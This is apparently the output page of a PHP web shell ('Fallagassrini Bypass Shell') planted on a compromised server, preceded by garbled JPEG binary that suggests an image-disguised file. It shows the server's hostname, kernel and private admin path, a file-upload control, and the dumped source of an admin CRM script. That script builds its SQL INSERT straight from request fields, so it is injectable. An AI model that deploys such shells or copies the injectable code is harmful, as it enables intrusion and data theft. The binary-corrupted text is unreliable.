JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/domains/tarinienterprises.in/private_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/domains/tarinienterprises.in/private_html/admin/addnewcall.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");
check_userlogin();

if($_SERVER['REQUEST_METHOD']=="POST" && $_REQUEST["btnsubmit"]=="Save")
{
	$sqluser="SELECT max(account_no) as sid FROM tbl_newcall_details ";
	$rowuser = $db->Execute($sqluser);
	$total_max = $rowuser->RecordCount();
	
	if($total_max>0 && $rowuser->fields["sid"]!="Null" && !empty($rowuser->fields["sid"]))
		$snewid=$rowuser->fields["sid"]+1;
	else
		$snewid='200001';	        
	 
	 
	$ins_emp = "insert into tbl_newcall_details set
				account_no		= '".$snewid."',
				title			= '".$_REQUEST["saluname"]."',
				fname			= '".$_REQUEST["firstname"]."',
				lname			= '".$_REQUEST["lastname"]."',
				email_id		= '".$_REQUEST["peremail"]."',
				home_no			= '".$_REQUEST["contactno"]."',
				cell_no			= '".$_REQUEST["mobno"]."',
				address			= '".$_REQUEST["adddet"]."',
				note_details	= '".$_REQUEST["notedet"]."',
				selcountry		= '".$_REQUEST["selcountry"]."',
				selstate		= '".$_REQUEST["residntstate"]."',
				zipcode			= '".$_REQUEST["zipcode"]."',
				city_name		= '".$_REQUEST["selcity"]."',
				time_zone		= '".$_REQUEST["tmezone"]."',
				call_source		= '".$_REQUEST["callsource"]."',
				pc_brand		= '".$_REQUEST["pcbrand"]."',
				pc_model		= '".$_REQUEST["pcmodel"]."',
				os_system		= '".$_REQUEST["osoption"]."',
				how_old			= '".$_REQUEST["howold"]."',
				attached_device	= '".addslashes($_REQUEST["attdevice"])."',
				problems_brief	= '".addslashes($_REQUEST["problemsss"])."',
				voice_status	= '".$_REQUEST["voicestatus"]."',
				added_date		= '".date("Y-m-d")."',
				addedby			= '".$_SESSION['uniqID']."'";
				
			/*echo "<pre>";
			print_r($ins_emp);   	                 
			die;*/
			
		$ins_result = $db->Execute($ins_emp) or die(mysql_error());
		
	if(ins_result)
	{
		url_redirect("serviceboard.php?add=1");
	}
}


require '../fckeditor/fckeditor.php';
$oFCKeditor = new FCKeditor('attdevice') ;
$oFCKeditor->BasePath	= '../fckeditor/' ;
$oFCKeditor->Width = '520px';
$oFCKeditor->Height = '250px';
$oFCKeditor->Value		='';

//require '../fckeditor/fckeditor.php';
$oFCKeditor1 = new FCKeditor('problemsss') ;
$oFCKeditor1->BasePath	= '../fckeditor/' ;
$oFCKeditor1->Width = '520px';
$oFCKeditor1->Height = '250px';
$oFCKeditor1ss->Value		='';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title><?php echo PROJECT_TITLE;?></title>
	<link rel="stylesheet" type="text/css" href="css/text.css" />
    <link rel="stylesheet" type="text/css" href="css/grid.css"  />
    <link rel="stylesheet" type="text/css" href="css/layout.css"/>
    <link rel="stylesheet" type="text/css" href="css/nav.css"  />
    <link rel="stylesheet" type="text/css" href="css/reset.css" />
    <link href="css/demo_page.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="includes/jquery.js" type="text/javascript"></script>
<script language="javascript" src="includes/classified_ajax.js" type="text/javascript"></script>    
<script src="includes/javascript_function.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
//==== Validate form filled by user ================== 
function validateinfo()
{
	     
	 
	var saluname=trim(document.frmcrm.saluname.value);
	var firstname=trim(document.frmcrm.firstname.value);
	var contactno=trim(document.frmcrm.contactno.value);
	var selcountry=trim(document.frmcrm.selcountry.value);
	var residntstate=trim(document.frmcrm.residntstate.value);
	var callsource=trim(document.frmcrm.callsource.value);
	
	if(saluname=="")
	{
		alert('Please select Salutation.');
		document.frmcrm.saluname.focus();
		return false;
	}
	else if(firstname=="")
	{
		alert('First name should not be blank.');
		document.frmcrm.firstname.focus();
		return false;
	}
	else if(contactno=="")
	{
		alert('Home No should not be blank.');
		document.frmcrm.contactno.focus();
		return false;
	}
	else if(selcountry=="")
	{
		alert('Please select country.');
		document.frmcrm.selcountry.focus();
		return false;
	}
	else if(residntstate=="")
	{
		alert('Please select state.');
		document.frmcrm.residntstate.focus();
		return false;
	}
	else if(callsource=="")
	{
		alert('Please select Call Source.');
		document.frmcrm.callsource.focus();
		return false;
	}
}
</script>
<!-- CAlendar Code here-->
<link type="text/css" href="calen/base/ui.all.css" rel="stylesheet" />
<script type="text/javascript" src="calen/jquery-1.3.2.js"></script>
<script type="text/javascript" src="calen/ui/ui.datepicker.js"></script>
<link type="text/css" href="calen/demos.css" rel="stylesheet" />
<script language="javascript" type="text/javascript">

$(function() {
			 
		$("#datepicker").datepicker({minDate: -30, maxDate: +30});
	});	

$(function() {
			 
		$("#datepicker1").datepicker({minDate: -30, maxDate: +30});
	});	
</script>
          
</head>

<body style="margin:0px; padding:0px;">
<div class="container_12">
        <div class="grid_12 header-repeat">
        <?php include("includes/service_top.php");?>
        </div>
        <div class="clear">
        </div>
        <?php //include("includes/topmenu.php");?>
        <div class="clear">
        </div>
        <div class="grid_2">
        <?php include("includes/leftmenu.php");?>    
        </div>
        <div class="grid_10">
            <div class="box round first">
                <h2>Add New Call/Customer</h2>
                <div class="block">
                <!-- Table data start-->
<form name="frmcrm" id="frmcrm" action="" method="post" onsubmit="return validateinfo();" enctype="multipart/form-data">
<table width="100%" cellpadding="5" cellspacing="0" border="0" style="border:0px solid #999; border-collapse:collapse; font-size:12px;">
 <tr>
 <td colspan="2">
 <div id="exists">
 
 </div>
 </td>
 </tr>
 <tr>
    <td valign="top" width="50%">
    <fieldset style="border:1px solid #CCC; padding-left:10px;">
    <legend style="background-color:#CCC; color:#333; font-weight:bold; padding:6px;">Indentity Information</legend>
    <table border="0" width="95%" style="background-image:none; border:none;">
    <tr>
    <td align="right" width="30%"><label><b><span class="requfield">*</span>Salutation : </b></label></td>
    <td width="70%">
    <select name="saluname" id="saluname" class="widsel">
    <option value="">Select Salutation</option>
    <option value="Mr.">Mr.</option>
    <option value="Mrs.">Mrs.</option>
    <option value="Ms.">Ms.</option>
    </select>    
    </td>
    </tr>
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>First Name : </b></label></td>
    <td><input type="text"  name="firstname" id="firstname"  value="" class="widtxt" /></td>
    </tr>  
    <tr>
    <td align="right"><label><b>Last Name : </b></label></td>
    <td><input type="text"  name="lastname" id="lastname"  value="" class="widtxt" /></td>
    </tr>   
    <tr>
    <td align="right"><label><b>Email : </b></label></td>
    <td><input type="text"  name="peremail" id="peremail" onblur="checkvalidcustomer(this.value);"  value="" class="widtxt" />
    <div id="msgerr" style="color:#F00;"></div>
    </td>
    </tr>    
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>Home : </b></label></td>
    <td><input type="text"  name="contactno" id="contactno" onblur="homecheck(this.value);"  value="" class="widtxt" />
    <div id="msgerr1" style="color:#F00;"></div>
    </td>
    </tr>
    <tr>
    <td align="right"><label><b>Cell : </b></label></td>
    <td><input type="text"  name="mobno" id="mobno"  value="" onblur="mobilecheck(this.value);" class="widtxt" />
    <div id="msgerr2" style="color:#F00;"></div>
    </td>
    </tr>
    <tr>
    <td align="right" width="40%"><label><b>Address : </b></label></td>
    <td width="60%"><textarea name="adddet" id="adddet" rows="2" cols="40" class="mini"></textarea>    </td> 
    </tr>
    <tr>
    <td align="right" width="40%"><label><b>Note : </b></label></td>
    <td width="60%"><textarea name="notedet" id="notedet" rows="3" cols="40" class="mini"></textarea>    </td> 
    </tr>

    </table>
    </fieldset>
    
    </td>
    <td valign="top" width="50%">
     <fieldset style="border:1px solid #CCC; padding-left:10px; padding-bottom:10px;">
    <legend style="background-color:#CCC; color:#333; font-weight:bold; padding:6px;">Call and PC Details</legend>
        <table border="0" width="95%" style="background-image:none; border:none;">
    
    <tr>
    <td align="right" width="30%"><label><b><span class="requfield">*</span>Select Country : </b></label></td>
    <td width="70%">
     <select name="selcountry" id="selcountry" class="widsel" onchange="statelist(this.value);">
    <option value="">Select Country</option>
    <option value="1">United States</option>
    <option value="2">Canada</option>
    </select>    
    
    </td>
    </tr>
    <tr>
    <td align="right" width="40%"><label><b><span class="requfield">*</span>Select State : </b></label></td>
    <td width="60%">
   <div id="stateval">
	<select name="residntstate" id="residntstate" class="widsel" >
	<option value="">- Select State -</option>
	</select>
    </div>
    </td>
    </tr>
    <tr>
    <td align="right" width="40%"><label><b>Zip Code : </b></label></td>
    <td width="60%">
    <input type="text"  name="zipcode" id="zipcode"  value="" class="widtxt" />
    </td> 
    </tr>
    <tr>
    <td align="right" width="40%"><label><b>City : </b></label></td>
    <td width="60%">
    <input type="text"  name="selcity" id="selcity"  value="" class="widtxt" />
    </td> 
    </tr>
    <tr>
    <td align="right"><label><b>Time Zone : </b></label></td>
    <td>
    <select name="tmezone" id="tmezone" class="widsel">
    <option value="">Select Time Zone</option>
    <option value="Alaska Time">Alaska Time</option>
    <option value="Central Time">Central Time</option>
    <option value="Eastern Time">Eastern Time</option>
    <option value="Hawaii Time">Hawaii Time</option>
    <option value="Mountain Time">Mountain Time</option>
    <option value="Pacific Time">Pacific Time</option>
    
    </select>  
    </td>
    </tr>
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>Call Source : </b></label></td>
    <td>
    <select name="callsource" id="callsource" class="widsel">
    <option value="">Select Call Source</option>
    <option value="Google">Google</option>
    <option value="ORS">ORS</option>
    </select>   
    </td>
    </tr>
    <tr>
    <td align="right"><label><b>PC Brand : </b></label></td>
    <td><input type="text"  name="pcbrand" id="pcbrand"  value="" class="widtxt" /></td>
    </tr>
    <tr>
    <td align="right"><label><b>PC Model : </b></label></td>
    <td>
    <select name="pcmodel" id="pcmodel" class="widsel">
    <option value="">Select PC Model</option>
    <option value="Laptop">Laptop</option>
    <option value="Desktop">Desktop</option>
    <option value="Notebook">Notebook</option>
    </select>  
    </td>
    </tr>
    <tr>
    <td align="right"><label><b>Operating System : </b></label></td>
    <td>
    <select name="osoption" id="osoption" class="widsel">
    <option value="">Select Operating System</option>
    <option value="Win95">Win95</option>
    <option value="Win98">Win98</option>
    <option value="WinMe">WinMe</option>
    <option value="Win2000">Win2000</option>
    <option value="Win XP">Win XP</option>
    <option value="Win Vista">Win Vista</option>
    <option value="Win7">Win7</option>
    <option value="Win8">Win8</option>
    </select>  
    </td>
    </tr>
    <tr>
    <td align="right"><label><b>How Old : </b></label></td>
    <td><input type="text"  name="howold" id="howold"  value="" class="widtxt" /></td>
    </tr>
    <tr>
    <td align="right"><label><b>Voice Status: </b></label></td>
    <td>
    <select name="voicestatus" id="voicestatus" class="widsel">
    <option value="">Select Voice Status</option>
    <option value="1">Voice Mail</option>
    <option value="2">Not Home</option>
    <option value="3">Busy</option>
    <option value="4">Call Back</option>
    <option value="5">Not Interested</option>
    <option value="6">Sale</option>
    <option value="7">Credit Card Problem</option>
    <option value="8">Refund</option>
    <option value="9">Already Subscribed</option>
    <option value="10">Transfered Support</option>
    </select>  
    </td>
    </tr>
    </table>
    </fieldset>
</td>
  </tr>
  <tr>
    <td colspan="2">
        <fieldset style="border:1px solid #CCC; padding-left:10px; padding-bottom:10px;">
        <legend style="background-color:#CCC; color:#333; font-weight:bold; padding:6px;">Device and Problems Details</legend>
            <table border="0" width="95%" style="background-image:none; border:none;">
        
        <tr>
        <td width="50%">
        <label><b><!--<span class="requfield">*</span>-->Attached Devices : </b></label><br />
        <?php echo $oFCKeditor->Create();?>
        </td>
        <td width="50%">
         <label><b>Problems in Brief : </b></label><br />
        <?php echo $oFCKeditor1->Create();?>
        </td>
        </tr>
        
        </table>
        </fieldset>
    </td>
  </tr>
  <tr>
    <td colspan="2" align="center">
    <!--<a href="add_device.php">-->
    <input class="submit-green" name="btnsubmit" id="btnsubmit" type="submit" value="Save" />
    <!--</a>-->
    </td>
  </tr>
</table>
</form>	               
                <!-- Table data end-->
                </div>
            </div>
            
        </div>
        
        
        <div class="clear">
        </div>
    </div>
    <div class="clear">
    </div>
    <?php include("includes/footer.php");?>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net